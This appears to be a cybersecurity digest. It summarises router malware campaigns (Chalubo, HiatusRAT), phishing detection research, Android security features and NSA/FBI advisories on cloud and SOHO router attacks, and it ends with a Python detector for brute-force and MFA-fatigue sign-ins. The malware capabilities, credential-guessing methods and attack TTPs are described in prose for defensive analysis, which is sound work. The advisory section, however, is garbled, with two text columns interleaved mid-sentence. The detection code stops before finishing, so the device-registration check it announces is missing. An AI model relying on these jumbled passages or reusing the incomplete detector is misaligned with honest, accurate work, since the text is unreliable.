FIRMWARE OVERWRITE: THE NEW TREND IN ROUTER FASHION

The Chalubo RAT malware campaign targeted specific models of Actiontec and Sagemcom routers, primarily affecting Windstream's network. The malware used brute-force attacks to gain access, executed its payloads in memory to avoid detection, and communicated with C2 servers over encrypted channels. The attack led to a significant outage requiring the replacement of over 600,000 routers, highlighting the need for robust security measures and regular updates to prevent such incidents.

ISP Impact:
• Windstream: The affected ISP, with over 600K routers rendered inoperable between Oct 25th and Oct 27th, 2023.
• Affected Models: Actiontec T3200, T3260, and Sagemcom F5380.
• Impact: Approximately 49% of the ISP's modems were taken offline, requiring hardware replacements.

Global Impact:
• Botnet Activity: From September to November 2023, Chalubo botnet panels interacted with up to 117,000 unique IP addresses over a 30-day period.
• Geographic Distribution: Most infections were in the US, Brazil, and China.
• Operational Silos: 95% of bots communicated with only one control panel, indicating distinct operational silos.

Affected Routers
• Targeted Models: End-of-life business-grade routers.
• Actiontec T3200 and T3260 are VDSL2 wireless AC gateway routers approved by Windstream.
• Sagemcom F5380 is a WiFi 6 (802.11ax) router.
• DrayTek Vigor models 2960 and 3900 (the targets of the separate Hiatus campaign described below).

Malware: Chalubo RAT
• First Spotted: August 2018 by Sophos Labs.
• Primary Functions: DDoS attacks, execution of Lua scripts, and evasion techniques using ChaCha20 encryption.

Technical Details:
• Initial Infection: Brute-force attacks on SSH servers with weak credentials (e.g., root:admin).
• Payload Delivery:
  • First Stage: A bash script ("get_scrpc") fetches a second script ("get_strtriiush"), which retrieves and executes the primary bot payload ("Chalubo" or "mips.elf").
  • Execution: The malware runs in memory, wipes its files from disk, and changes its process name to avoid detection.
• Communication:
  • C2 Servers: Cycles through hardcoded C2s, downloads the next stage, and decrypts it using ChaCha20.
• Persistence: The newer version does not maintain persistence on infected devices; a reboot removes the in-memory payload, but a device that still accepts the same weak credentials is simply reinfected.

HiatusRAT Malware
• Port 8816: HiatusRAT checks for existing processes on port 8816, kills any existing service, and opens a listener on that port.
• Information Collection: Collects host-based information and sends it to the C2 server to track infection status and log information about the compromised host.
• Initial Access: Exploitation of vulnerabilities in router firmware or use of weak credentials.
• Persistence: Uses a bash script to download and execute HiatusRAT and the packet-capture binary.
• Prebuilt Functions:
  • config: Loads new configuration values from the C2 node.
  • shell: Spawns a remote shell on the infected host.
  • file: Allows reading, deleting, or uploading files to the C2.
  • executor: Downloads and executes files from the C2.
  • script: Executes scripts supplied by the C2.
  • tcp_forward: Forwards TCP data from a specified port to another IP address and port.
  • socks5: Sets up a SOCKS5 proxy on the compromised router.
  • quit: Ceases execution of the malware.
• Packet Capture: A variant of tcpdump is deployed to capture and monitor router traffic on ports associated with email and file-transfer communications.

Black Lotus Labs Uncovers New Router Malware Campaigns
• Black Lotus Labs, the threat research team at Lumen Technologies (formerly CenturyLink), has recently uncovered two major malware campaigns targeting routers and networking devices from different manufacturers. These discoveries highlight the increasing threats faced by internet infrastructure and the need for better security practices.

The Hiatus Campaign
• In March 2023, Black Lotus Labs reported on a complex campaign called "Hiatus" that had been targeting business-grade routers, primarily DrayTek Vigor models 2960 and 3900, since June 2022.
• The threat actors exploited end-of-life DrayTek routers to establish long-term persistence without detection.
• Around 4,100 vulnerable DrayTek models were exposed on the internet, with Hiatus compromising approximately 100 of them across Latin America, Europe, and North America.
• Upon infection, the malware intercepts data transiting the infected router and deploys a Remote Access Trojan (RAT) called "HiatusRAT" that can proxy malicious traffic to additional networks.
• Black Lotus Labs has null-routed the Hiatus command-and-control (C2) servers across Lumen's global backbone and added the
indicators of compromise (IoCs) to their Rapid Threat Defense system to block threats before they reach customer networks.

The Pumpkin Eclipse Campaign
• In late October 2023, Black Lotus Labs investigated a massive outage affecting specific ActionTec (T3200s and T3260s) and Sagemcom (F5380) gateway models within a single internet service provider's network.
• Over 600,000 devices displayed a static red light, indicating a likely firmware corruption issue.
• The attack was confined to a specific Autonomous System Number (ASN), impacting around 49% of exposed devices in that network.
• Black Lotus Labs discovered a multi-stage infection mechanism that installed the Chalubo RAT, a botnet targeting SOHO gateways and IoT devices.
• Black Lotus Labs has added the IoCs from this campaign and the Chalubo malware to their threat intelligence feed, fueling Lumen's Connected Security portfolio.

WHY CLICKING ON 'URGENT INVOICE' EMAILS IS THE BEST WAY TO MAKE FRIENDS WITH IT

The post titled "On Fire Drills and Phishing Tests" discusses the importance of phishing tests and fire drills in enhancing organizational security.

Importance of Phishing Tests
• Phishing Tests as Training Tools: Phishing tests are used to train employees to recognize and respond to phishing attempts. They simulate real-world phishing attacks to help employees identify suspicious emails and links.
• Behavioral Insights: These tests provide insights into employee behavior and the effectiveness of current training programs. They help identify which employees or departments are more susceptible to phishing attacks.

Fire Drills for Incident Response
• Simulated Incidents: Fire drills involve simulating security incidents to test the organization's incident response capabilities, including how quickly and effectively the team can detect, respond to, and mitigate security threats.
• Preparedness and Improvement: Regular fire drills help ensure that the incident response team is prepared for actual security incidents. They also highlight areas for improvement in the incident response plan.

Integration of Phishing Tests and Fire Drills
• Comprehensive Security Training: Combining phishing tests with fire drills provides a comprehensive approach to security training. It ensures that employees are not only aware of phishing threats but also know how to respond to them effectively.
• Realistic Scenarios: By integrating the two methods, organizations can create more realistic and challenging scenarios that better prepare employees for real-world threats.

Metrics and Evaluation
• Measuring Effectiveness: Both phishing tests and fire drills should be evaluated using metrics, such as the number of employees who fall for phishing tests and the response times during fire drills.
• Continuous Improvement: The data collected from these exercises should be used to continuously improve security training programs and incident response plans.

Organizational Culture
• Promoting a Security-First Culture: Regular phishing tests and fire drills help promote a culture of security within the organization. They reinforce the importance of security awareness and preparedness among employees.
• Encouraging Reporting: These exercises encourage employees to report suspicious activities and potential security incidents, fostering a proactive security environment.

ANDROID LIVE THREAT DETECTION: 200 BILLION SCANS A DAY STILL WON'T CATCH EVERYTHING

The security updates announced at Google I/O 2024 are poised to enhance the security and privacy of Android devices significantly, impacting various industries by reducing fraud, protecting sensitive data, and fostering greater trust in mobile technologies.

Google Play Protect Live Threat Detection:
• Functionality: Scans 200 billion Android apps daily using on-device AI to detect and mitigate malware and fraudulent apps.
• Implementation: Uses the Private Compute Core for privacy-preserving analysis.
• Deployment: Available on devices from manufacturers including Google Pixel, Honor, Lenovo, Nothing, OnePlus, Oppo, Sharp, and Transsion.

Stronger Protections Against Fraud and Scams:
• Scam Call Detection: Uses the on-device Gemini Nano model to detect and alert users about potential scam calls in real time.
• Screen Sharing Safeguards: Enhanced controls to prevent social engineering attacks during screen sharing.
• Advanced Cellular Security: New protections against cell site simulators to prevent surveillance and SMS-based fraud.

Private Space Feature:
• Functionality: Allows users to create a secure, siloed portion of the OS for sensitive information, similar to Incognito mode.
• Developer Access: Available for developers to experiment with, with a bug fix expected soon.

Enhanced Developer Tools:
• Play Integrity API: Updated to include new in-app signals to help developers detect and prevent fraudulent or risky behavior.
• Photo Picker: Improved to support cloud storage services and to enforce stricter permissions for accessing photos and videos.

Impact on Industries

Financial Services:
• Fraud Prevention: Enhanced scam call detection and advanced cellular security features will significantly reduce the risk of financial fraud and scams, protecting both consumers and financial institutions.
• Data Privacy: The Private Space feature keeps sensitive financial data isolated, fostering greater trust in mobile banking and financial apps.

Healthcare:
• Patient Data Security: The improved security measures, including live threat detection and Private Space, will help protect sensitive patient information stored on mobile devices.
• Telehealth: Enhanced screen-sharing safeguards will secure telehealth sessions, preventing unauthorized access to patient data during remote consultations.

E-commerce:
• Transaction Security: Scam call detection and advanced cellular security will protect users from phishing and fraud attempts, making online transactions safer.
• User Trust: Enhanced privacy controls and secure app environments will increase user confidence in mobile shopping platforms.

Telecommunications:
• Network Security: Advanced cellular protections will help telecom providers safeguard their networks from cell site simulators and other surveillance tools.
• Customer Safety: Real-time scam detection features will enhance customer safety, reducing the incidence of fraud-related complaints.

App Development:
• Security Integration: Developers can leverage the updated Play Integrity API and other security tools to build more secure apps, reducing the risk of exploitation and abuse.
• User Privacy: Stricter photo permissions and the Private Space feature will help developers ensure compliance with privacy regulations and build user trust.


CONTENTS


ANTIPHISHSTACK

In a world where clicking on a link is akin to navigating a minefield, phishing emerges as the supervillain. Enter our heroes: the researchers behind this paper, armed with their shiny new weapon, the AntiPhishStack. It's not just any model; it's a two-phase, LSTM-powered, cybercrime-fighting marvel that doesn't need to know squat about phishing to catch a phisher.

The methodology? They've concocted a concoction so potent it could make traditional phishing detection systems weep in their outdatedness. By harnessing the mystical powers of Long Short-Term Memory networks and the alchemy of character-level TF-IDF features, they've created a phishing detection elixir that's supposed to be the envy of cybersecurity nerds everywhere.

The analysis will also delve into the practical applications of the model, discussing how it can be integrated into existing cybersecurity measures and its potential impact on reducing phishing attacks. The document's relevance to cybersecurity professionals, IT specialists, and stakeholders in various industries will be highlighted, emphasizing the importance of advanced phishing detection techniques in the current digital landscape. This summary will serve as a valuable resource for cybersecurity experts, IT professionals, and others interested in the latest developments in phishing detection and prevention.

FUXNET

This time, we're diving into the murky waters of Fuxnet malware, a brainchild of the illustrious Blackjack hacking group.

Let's set the scene: Moscow, a city unsuspectingly going about its business, unaware that it's about to be the star of Blackjack's latest production. The method? Oh, nothing too fancy, just the classic "let's potentially disable sensor-gateways" move.

In a move of unparalleled transparency, Blackjack decides to broadcast their cyber conquests on ruexfil.com. Because nothing screams "covert operation" like a public display of your hacking prowess, complete with screenshots for the visually inclined.

The initial claim of 2,659 sensor-gateways laid to waste? A slight exaggeration, it seems. The actual tally? A little over 500. It's akin to declaring world domination and then barely managing to annex your backyard.

For Blackjack, the dramatists hint at a sequel, suggesting the JSON files were merely a teaser of the chaos yet to come. Because what's a cyberattack without a hint of sequel bait, teasing audiences with the promise of more digital destruction?

NSA'S PANIC. ADAPTTACTICS

Buckle up for another episode of "Cyber Insecurity," featuring our favorite villains, the cyber actors, and their latest escapades in the cloud! This time, the NSA and FBI have teamed up to bring us a gripping tale of how these nefarious ne'er-do-wells have shifted their playground from the boring old on-premises networks to the shiny, vast expanses of cloud services.

The document sounds more like a how-to guide for aspiring cyber villains than a warning. It details the cunning shift in tactics as these actors move to exploit the fluffy, less-guarded realms of cloud-based systems.

If you thought your data was safer in the cloud, think again. The cyber actors are just getting started, and they've got their heads in the cloud, looking for any opportunity to rain on your digital parade. So, update those passwords, secure those accounts, and maybe keep an umbrella handy, because it's getting cloudy out there!

NSA'S PANIC. UBIQUITI EDGEROUTERS

The FBI, NSA, and their international pals have graced us with yet another Cybersecurity Advisory (CSA), this time starring the ever-so-popular Ubiquiti EdgeRouters in their leading role in the global cybercrime drama directed by none other than APT28.

In this latest blockbuster release from our cybersecurity overlords, we learn how Ubiquiti EdgeRouters, those user-friendly, Linux-based gadgets, have become the unwilling accomplices in APT28's nefarious schemes. With their default credentials and "what firewall?" security, these routers are practically rolling out the red carpet for cyber villains.

If you're using Ubiquiti EdgeRouters and haven't been hacked yet, congratulations! But maybe check those settings, update that firmware, and change those passwords. Or better yet, just send your router on a nice vacation to a place where APT28 can't find it. Happy securing!


NSA'S PANIC. SOHO

Another riveting document on the ever-so-secure world of Small Office/Home Office (SOHO) routers. This time, we're treated to a delightful analysis that dives deep into the abyss of security defects, exploits, and the catastrophic impacts on critical infrastructure.

The document serves up a qualitative smorgasbord of how these devices are basically open doors for state-sponsored cyber parties. It's a must-read for anyone who enjoys a good cyber security scare, complete with a guide on how not to design a router. Manufacturers are given a stern talking-to about adopting "secure by design" principles, which is a way of saying, "Maybe try not to make it so easy for the bad guys?"

So, if you're looking for a guide on how to secure your SOHO router, this document is perfect. It's like a how-to guide, but for everything you shouldn't do.

DETECTION OF ENERGY CONSUMPTION CYBER ATTACKS ON SMART DEVICES

In a world where smart devices are supposed to make our lives easier, "Detection of Energy Consumption Cyber Attacks on Smart Devices" dives into the thrilling saga of how these gadgets can be turned against us. Imagine your smart fridge plotting to drain your energy bill while you sleep, or your thermostat conspiring with your toaster to launch a cyberattack. This paper heroically proposes a lightweight detection framework to save us from these nefarious appliances by analyzing their energy consumption patterns. Because, clearly, the best way to outsmart a smart device is to monitor how much juice it's guzzling. So, next time your smart light bulb flickers, don't worry, it's just the algorithm doing its job.

MEDIHUNT

The paper "MediHunt: A Network Forensics Framework for Medical IoT Devices" is a real page-turner. It starts by addressing the oh-so-urgent need for robust network forensics in Medical Internet of Things (MIoT) environments. You know, those environments where MQTT (Message Queuing Telemetry Transport) networks are the darling of smart hospitals because of their lightweight communication protocol.

MediHunt is an automatic network forensics framework designed for real-time detection of network flow-based traffic attacks in MQTT networks. It leverages machine learning models to enhance detection capabilities and is suitable for deployment on those ever-so-resource-constrained MIoT devices. Because, naturally, that's what we've all been losing sleep over.

These points set the stage for the detailed discussion of the framework, its experimental setup, and evaluation presented in the subsequent sections of the paper. Can't wait to dive into those thrilling details!


SECTION:
KEYPOINTS

* check out full content in unpacking and research sections


A. AntiPhishStack

The paper titled "LSTM-based Stacked Generalization Model for Optimized Phishing" discusses the escalating reliance on online web services, which has introduced heightened security risks, with persistent challenges posed by phishing attacks.

Phishing, a deceptive method combining social and technical engineering, poses a severe threat to online security; it aims to obtain user identities, personal account details, and bank credentials illicitly. It is a primary concern within criminal activity, with phishers pursuing objectives such as selling stolen identities, extracting cash, exploiting vulnerabilities, or deriving other financial gains.

The study aims to advance phishing detection by operating without prior phishing-specific feature knowledge. The model leverages Long Short-Term Memory (LSTM) networks, a type of recurrent neural network capable of learning order dependence in sequence prediction problems. It learns URLs and character-level TF-IDF features symmetrically, enhancing its ability to combat emerging phishing threats.

1) Methodology and Significance of the study
The paper presents a novel model for detecting phishing sites. The significance of the study lies in its advancement of phishing detection techniques, specifically through the introduction of a two-phase stacked generalization model named AntiPhishStack. The model is designed to detect phishing sites without requiring prior knowledge of phishing-specific features, a significant improvement over traditional phishing detection systems that rely on machine learning with manually engineered features.

This research contributes to the ongoing discourse on symmetry and asymmetry in information security and provides a forward-thinking solution for enhancing network security in the face of evolving cyber threats.

The data source used in the study comprises two benchmark datasets of benign and phishing (malicious) URLs, used for experimental validation of the model. The datasets are referred to as DS1 and DS2 within the paper: DS1 includes benign Yandex sites and PhishTank phishing sites, and DS2 consists of benign sites from Common Crawl and the Alexa database and phishing sites from PhishTank.

2) Key components
According to the methodology, the proposed model operates in two phases (a two-phase stacked generalization model):
• Phase I: The model learns URLs and character-level TF-IDF features symmetrically. These features are trained on a base machine learning classifier, employing K-fold cross-validation for a robust mean prediction.
• Phase II: A two-layered stacked LSTM network with five adaptive optimizers is used for dynamic compilation, ensuring premier prediction on these features.
• Finally, the symmetrical predictions from both phases are optimized and integrated to train a meta-XGBoost classifier, contributing to a final robust prediction.

3) Benefits and limitations of the study
Comparatively, traditional phishing systems, reliant on machine learning and manual features, struggle with evolving tactics. Other models, such as the CNN-LSTM model and the end-to-end deep learning architecture grounded in natural language processing techniques, have shown limitations in their generalization on test data and their dependency on existing knowledge of phishing detection. The model, in contrast, shows strong generalization ability and independence from prior feature knowledge, making it a robust and effective tool for phishing detection.

The benefits of the study compared to traditional phishing systems include:
• Prior Feature Knowledge Independence: The proposed model does not require prior phishing-specific feature knowledge, which allows it to adapt to new and evolving phishing tactics more effectively than traditional systems that rely on predefined features.
• Strong Generalization Ability: The model uses URL character-based features for robust generalization and accuracy, which enables it to generalize across different phishing threats better than traditional systems that may not adapt as well to variations in phishing URLs.
• Independence from Cybersecurity Experts and Third-Party Services: The model autonomously extracts the necessary URL features, reducing the reliance on cybersecurity experts and on third-party services such as page rank or domain age, which traditional systems may depend on.


• High Accuracy: The model has demonstrated exceptional performance, achieving a notable 96.04% accuracy on the benchmark datasets, a significant improvement over traditional phishing detection systems.
• Adaptability to Evolving Threats: The model's design allows it to learn from the data it processes, making it potentially more adaptable to the continuously evolving tactics used by phishers, unlike traditional systems that may require manual updates to stay effective.

Limitations of the study include:
• Real-World Application: The paper does not discuss the model's performance in real-world scenarios where phishing tactics are constantly evolving.
• Performance on Other Datasets: The model's performance has been validated on two benchmark datasets, but it is unclear how it would perform on other datasets or in different contexts.
• Feature Reliance: The model's reliance on URL and character-level TF-IDF features may limit its ability to detect phishing attempts that use other tactics (a phishing page served from an otherwise ordinary-looking URL, for instance).
• Computational Resources: The paper does not discuss the computational resources required to implement the model, which could be a limitation for some users.

The proposed model also has several limitations in terms of scalability and performance:
• Firstly, the model's reliance on LSTM networks can lead to computational inefficiency. LSTM networks are known for their high computational and memory requirements, which can limit the model's scalability when dealing with large datasets or in real-time applications.
• Secondly, the model's two-phase approach, which involves training features on a base machine learning classifier and then employing a two-layered stacked LSTM network, can be time-consuming and computationally intensive. This could limit the model's performance in real-time phishing detection scenarios.
• Lastly, while the model is designed to operate without prior phishing-specific feature knowledge, this could also be a limitation. The model may struggle to accurately detect new or sophisticated phishing attempts that exploit features not represented in its training data.

B. NSA's panic. AdaptTactics

The document titled "Cyber actors adapt tactics for initial cloud access", released by the National Security Agency (NSA), warns that cyber actors have adapted their tactics to gain initial access to cloud services instead of exploiting on-premises network vulnerabilities.

This shift is a response to organizations modernizing their systems and moving to cloud-based infrastructure. The actors behind high-profile campaigns such as the SolarWinds supply chain compromise are now expanding their targeting to sectors such as aviation, education, law enforcement, local and state councils, government financial departments, and military organizations.

The stark reality is that to breach cloud-hosted networks, these actors need only authenticate with the cloud provider; once they succeed, the perimeter is gone. The document highlights a particularly disconcerting aspect of cloud environments: because a cloud tenant exposes far less network surface than an on-premises estate, the initial authentication step becomes the decisive linchpin of the intrusion.

1) Key findings
• Adaptation to Cloud Services: Cyber actors have shifted their focus from exploiting on-premises network vulnerabilities to directly targeting cloud services. This change is a response to the modernization of systems and the migration of organizational infrastructure to the cloud.
• Authentication as a Key Step: To compromise cloud-hosted networks, cyber actors must first successfully authenticate with the cloud provider. Preventing this initial access is crucial to stopping them from compromising the target.
• Expansion of Targeting: Cyber actors have broadened their targeting to include sectors such as aviation, education, law enforcement, local and state councils, government financial departments, and military organizations. This expansion indicates a strategic diversification of targets for intelligence gathering.
• Use of Service and Dormant Accounts: The advisory highlights that over the last 12 months cyber actors have been observed using brute-force attacks to access service and dormant accounts. This tactic allows them to gain initial access to cloud environments.
• Sophistication of Cyber Actors: These actors are capable of executing global supply chain compromises, such as the 2020 SolarWinds incident.
• Defense through Cybersecurity Fundamentals: The advisory emphasizes that a strong baseline of cybersecurity fundamentals can defend against these actors. For organizations that have transitioned to cloud infrastructure, protecting against the TTPs used for initial access is presented as the first line of defense.

2) Adaptation to Cloud Services
The adaptation of attacks to target cloud services marks a significant evolution in the landscape of cyber espionage and cyber warfare. This shift is not merely a change of target but a deeper strategic adaptation to the changing technological environment and the increasing reliance of governments and corporations on cloud infrastructure. The move towards cloud services by organizations is driven by the benefits of scalability, cost-efficiency, and the ability to rapidly deploy and update services. However, this transition also presents new vulnerabilities and challenges for cybersecurity.

3) TTPs details:
• Credential Access / T1110 Brute Force: Actors use password spraying and brute forcing as initial infection vectors. This involves attempting a few passwords against many accounts (password spraying) or many password attempts against a single account (brute forcing) to gain unauthorized access.
• Initial Access / T1078.004 Valid Accounts: Cloud Accounts: The actors gain access to cloud services using compromised credentials. This includes targeting both system accounts (used for automated tasks and services) and dormant accounts (inactive accounts that still remain on the system).
• Credential Access / T1528 Steal Application Access Token: Actors use stolen access tokens to log into accounts without needing the passwords. Access tokens are digital keys that grant access to user accounts, and obtaining them bypasses traditional login mechanisms.
• Credential Access / T1621 Multi-Factor Authentication Request Generation: Known as 'MFA bombing' or 'MFA fatigue', this technique involves actors repeatedly sending MFA requests to a victim's device. The goal is to overwhelm or fatigue the victim into accepting a request, thus granting the attacker access.
• Command and Control / T1090.002 Proxy: External Proxy: To maintain covert operations and blend in with normal traffic, actors use open proxies located in residential IP ranges. This makes malicious connections harder to distinguish from legitimate user activity in access logs.
• Persistence / T1098.005 Account Manipulation: Device Registration: After gaining access to accounts, actors attempt to register their own devices on the cloud tenant. Successful device registration can provide persistent access to the cloud environment.

C. NSA's panic. Ubiquiti

The advisory "...Routers to Facilitate Cyber Operations", released by the Federal Bureau of Investigation (FBI), National Security Agency (NSA), US Cyber Command, and international partners, warns of the use of compromised Ubiquiti EdgeRouters to facilitate malicious cyber operations worldwide.

The popularity of Ubiquiti EdgeRouters is attributed to their user-friendly, Linux-based operating system; they also ship with default credentials and limited firewall protections. The routers are often shipped with insecure default configurations and do not automatically update firmware unless configured to do so by the user.

The compromised EdgeRouters have been used by APT28 to harvest credentials, collect NTLMv2 digests, proxy network traffic, and host spear-phishing landing pages and custom tools. APT28 accessed the routers using default credentials and trojanized OpenSSH server processes. With root access to the compromised routers, the actors had unfettered access to the Linux-based operating systems to install tooling and obfuscate their identity.

APT28 also deployed custom Python scripts on the compromised routers to collect and validate stolen webmail

20
Read more: Boosty | Sponsr | TG

account credentials obtained through cross-site scripting and D. NSA’s panic. SOHO
browser-in-the-browser spear-phishing campaigns.
Additionally, they exploited a critical zero-day elevation-of-
privilege vulnerability in Microsoft Outlook (CVE-2023-23397)
to collect NTLMv2 digests from targeted Outlook accounts and
used publicly available tools to assist with NTLM relay attacks
1) Keypoints and takeaways
• APT28 (also known as Fancy Bear, Forest Blizzard, and
Strontium) have been exploiting compromised Ubiquiti
EdgeRouters to conduct malicious cyber ops globally.
• The exploitation includes harvesting credentials,
collecting NTLMv2 digests, proxying network traffic,
and hosting spear-phishing landing pages and custom
tools.
• The FBI, NSA, US Cyber Command, and international
partners have issued a joint Cybersecurity Advisory
(CSA) detailing the threat and providing mitigation
recommendations.
• The advisory includes observed tactics, techniques, and
procedures (TTPs), indicators of compromise (IOCs),
and maps the threat actors' activity to the MITRE
ATT&CK framework.
The exploitation of insecure SOHO routers by malicious
• The advisory urges immediate action to mitigate the cyber actors, particularly state-sponsored groups, poses a
threat, including performing hardware factory resets, significant threat to individual users and critical infrastructure.
updating firmware, changing default credentials, and Manufacturers are urged to adopt secure by design principles
implementing strategic firewall rules. and transparency practices to mitigate these risks, while users
• APT28 has used compromised EdgeRouters since at and network defenders are advised to implement best practices
least 2022 to facilitate covert operations against various for router security and remain vigilant against potential threats.
industries and countries, including the US. The root causes of insecure SOHO routers are multifaceted,
• The EdgeRouters are popular due to their user-friendly involving both technical vulnerabilities and lapses in secure
Linux-based operating system but are often shipped with design and development practices by manufacturers, as well as
default credentials and limited firewall protections. negligence on the part of users in maintaining router security.
• Widespread Vulnerabilities: A significant number of
• The advisory provides detailed TTPs and IOCs to help vulnerabilities, totaling 226, have been identified in
network defenders identify and mitigate the threat. popular SOHO router brands. These vulnerabilities range
• The advisory also includes information on how to map in severity but collectively pose a substantial security
malicious cyber activity to the MITRE ATT&CK risk.
framework. • Outdated Components: Core components such as the
• Organizations using Ubiquiti EdgeRouters must take Linux kernel and additional services like VPN in these
routers are outdated. This makes them susceptible to
immediate action to secure their devices against APT28
known exploits for vulnerabilities that have long since
exploitation. been made public.
• The recommended actions include resetting hardware to • Insecure Default Settings: Many routers come with
factory settings, updating to the latest firmware, easy-to-guess default passwords and use unencrypted
changing default usernames and passwords, and connections. This can be easily exploited by attackers.
implementing strategic firewall rules.
• Lack of Secure Design and Development: SOHO
• Network defenders should be aware of the TTPs and routers often lack basic security features due to insecure
IOCs provided in the advisory to detect and respond to design and development practices. This includes the
potential compromises. absence of automatic update capabilities and the presence
of exploitable defects, particularly in web management
interfaces.
• Exposure of Management Interfaces: Manufacturers
frequently create devices with management interfaces
exposed to the public internet by default, often without

21
Read more: Boosty | Sponsr | TG

notifying the customers of this frequently unsafe • Retail and Hospitality: These sectors are vulnerable to
configuration. data breaches involving customer information and
financial transactions due to insecure network devices.
• Lack of Transparency and Accountability: There is a
need for manufacturers to embrace transparency by • Manufacturing: Industrial control systems can be
disclosing product vulnerabilities through the CVE compromised through insecure routers, affecting
program and accurately classifying these vulnerabilities production lines and industrial processes.
using the Common Weakness Enumeration (CWE)
system • Education: Schools and universities are at risk of data
breaches and disruption of educational services.
• Neglect of Security in Favor of Convenience and
Features: Manufacturers prioritize ease of use and a wide • Government and Public Sector: Insecure routers can
variety of features over security, leading to routers that lead to unauthorized access to government networks,
are "secure enough" right out of the box without risking sensitive information and critical services
considering the potential for exploitation. 2) Key Findings on Malicious Cyber Actors Exploiting
• User Negligence: Many users, including IT Insecure SOHO Routers
professionals, do not follow basic security practices such • Exploitation by State-Sponsored Groups: The
as changing default passwords or updating firmware, People’s Republic of China (PRC)-sponsored Volt
leaving routers exposed to attacks. Typhoon group is actively compromising SOHO routers
by exploiting software defects. These compromised
• Complexity in Identifying Vulnerable Devices: routers are then used as launching pads to further
Identifying specific vulnerable devices is complex due to compromise U.S. critical infrastructure entities.
legal and technical issues, complicating the process of
mitigating these vulnerabilities. • Impact on Critical Infrastructure: Compromised
SOHO routers pose a significant threat as they can be
1) Affected industries used to move laterally within networks and further
The exploitation of insecure SOHO routers poses a compromise critical infrastructure sectors in the U.S.,
significant threat across multiple sectors, highlighting the need including communications, energy, transportation, and
for improved security practices and awareness. water sectors.
a) Communications • ZuoRAT Campaign: A sophisticated campaign
• Data Breaches and Eavesdropping: Insecure routers leveraging infected SOHO routers, dubbed ZuoRAT, has
can lead to unauthorized access to network traffic, been identified. This campaign involves a multistage
allowing attackers to intercept sensitive communications. remote access trojan (RAT) developed for SOHO
devices, enabling attackers to maintain a low-detection
• Disruption of Services: Compromised routers can be presence on target networks and exploit sensitive
used to launch Distributed Denial of Service (DDoS) information.
attacks, disrupting communication services.
• FBI's Response to Chinese Malware: The FBI has
b) Transportation taken proactive measures to disrupt the activities of
Infrastructure Vulnerability: The transportation sector Chinese hackers, specifically targeting SOHO routers
relies heavily on networked systems for operations. infected with the KV Botnet malware. This involved
Compromised routers could allow attackers to disrupt traffic issuing covert commands to infected devices to remove
management systems and logistics operations. the malware and prevent further access by the hackers,
highlighting the ongoing efforts to counteract the threats
c) Water posed by compromised SOHO routers.
Operational Technology (OT) Threats: Insecure routers
can provide a gateway for attackers to target OT systems within
the water sector, potentially affecting water treatment and
distribution systems.
d) Energy
Grid Security: The energy sector, particularly electric
utilities, is at risk of targeted attacks through insecure routers.
Attackers could gain access to control systems, posing a threat
to the stability of the power grid.
e) Other Industries
• Healthcare: Insecure routers can compromise patient
data and disrupt medical services by providing attackers
access to healthcare networks.

22
Read more: Boosty | Sponsr | TG
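The sign-in TTPs listed for the cloud advisory earlier in this section (T1110 brute forcing and password spraying, T1621 MFA fatigue, T1098.005 device registration) all leave traces in tenant sign-in logs, and the grouping logic that tells them apart is worth seeing in code. The Python below is an added example written for this digest, not material from the advisory or the agencies behind it. It runs over a constructed sample log; the record fields (`ts`, `src`, `user`, `event`, `result`), the event names and the thresholds are assumptions to be mapped onto a real identity provider's schema.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Thresholds are assumptions for this example; tune them per tenant.
SPRAY_MIN_ACCOUNTS = 5              # distinct accounts failed from one source...
SPRAY_MAX_PER_ACCOUNT = 2           # ...with at most this many failures each
BRUTE_MIN_FAILS = 10                # failures against one account from one source
MFA_MIN_PROMPTS = 5                 # MFA prompts to one user...
MFA_WINDOW = timedelta(minutes=10)  # ...inside this window
REG_WINDOW = timedelta(hours=1)     # device registered this soon after a sign-in

T0 = datetime(2024, 6, 1, 9, 0, 0)


def _ev(minute, src, user, event, result=""):
    """One constructed log record; the field names are assumptions."""
    return {"ts": T0 + timedelta(minutes=minute), "src": src,
            "user": user, "event": event, "result": result}


# Constructed sample log (TEST-NET addresses, invented users).
SAMPLE_LOG = (
    # password spraying: one source, one failure per account, then a hit
    [_ev(i, "203.0.113.10", f"user{i:02d}", "signin", "fail") for i in range(6)]
    + [_ev(6, "203.0.113.10", "user03", "signin", "success"),
       _ev(20, "203.0.113.10", "user03", "device_register")]
    # brute force: one source, one account, many failures
    + [_ev(i, "198.51.100.7", "svc-backup", "signin", "fail") for i in range(12)]
    # MFA fatigue: a burst of prompts to one user, then an acceptance
    + [_ev(30 + 0.7 * i, "192.0.2.5", "alice", "mfa_prompt") for i in range(6)]
    + [_ev(35, "192.0.2.5", "alice", "mfa_accept")]
    # ordinary activity that must not be flagged
    + [_ev(40, "10.0.0.12", "bob", "signin", "success"),
       _ev(40.2, "10.0.0.12", "bob", "mfa_prompt"),
       _ev(40.5, "10.0.0.12", "bob", "mfa_accept")]
)


def detect(events):
    """Return findings as dicts with keys ttp, subject, detail."""
    events = sorted(events, key=lambda e: e["ts"])
    findings = []

    # T1110: failed sign-ins grouped by source, then by account.
    fails = defaultdict(lambda: defaultdict(int))
    for e in events:
        if e["event"] == "signin" and e["result"] == "fail":
            fails[e["src"]][e["user"]] += 1
    hostile_src = set()
    for src, per_user in fails.items():
        # spraying: many accounts, few attempts each
        if (len(per_user) >= SPRAY_MIN_ACCOUNTS
                and max(per_user.values()) <= SPRAY_MAX_PER_ACCOUNT):
            findings.append({"ttp": "T1110 password spraying", "subject": src,
                             "detail": f"{len(per_user)} accounts, "
                                       f"<= {SPRAY_MAX_PER_ACCOUNT} attempts each"})
            hostile_src.add(src)
        # brute force: one account, many attempts
        for user, n in per_user.items():
            if n >= BRUTE_MIN_FAILS:
                findings.append({"ttp": "T1110 brute force", "subject": src,
                                 "detail": f"{n} failures against {user}"})
                hostile_src.add(src)

    # T1621: a burst of MFA prompts to one user; worse if one was accepted.
    prompts, accepts = defaultdict(list), defaultdict(list)
    for e in events:
        if e["event"] == "mfa_prompt":
            prompts[e["user"]].append(e["ts"])
        elif e["event"] == "mfa_accept":
            accepts[e["user"]].append(e["ts"])
    for user, ts in prompts.items():
        for i in range(len(ts) - MFA_MIN_PROMPTS + 1):
            if ts[i + MFA_MIN_PROMPTS - 1] - ts[i] <= MFA_WINDOW:
                accepted = any(a >= ts[i] for a in accepts[user])
                findings.append({"ttp": "T1621 MFA fatigue", "subject": user,
                                 "detail": "prompt burst "
                                           + ("accepted" if accepted else "not accepted")})
                break  # one finding per user is enough

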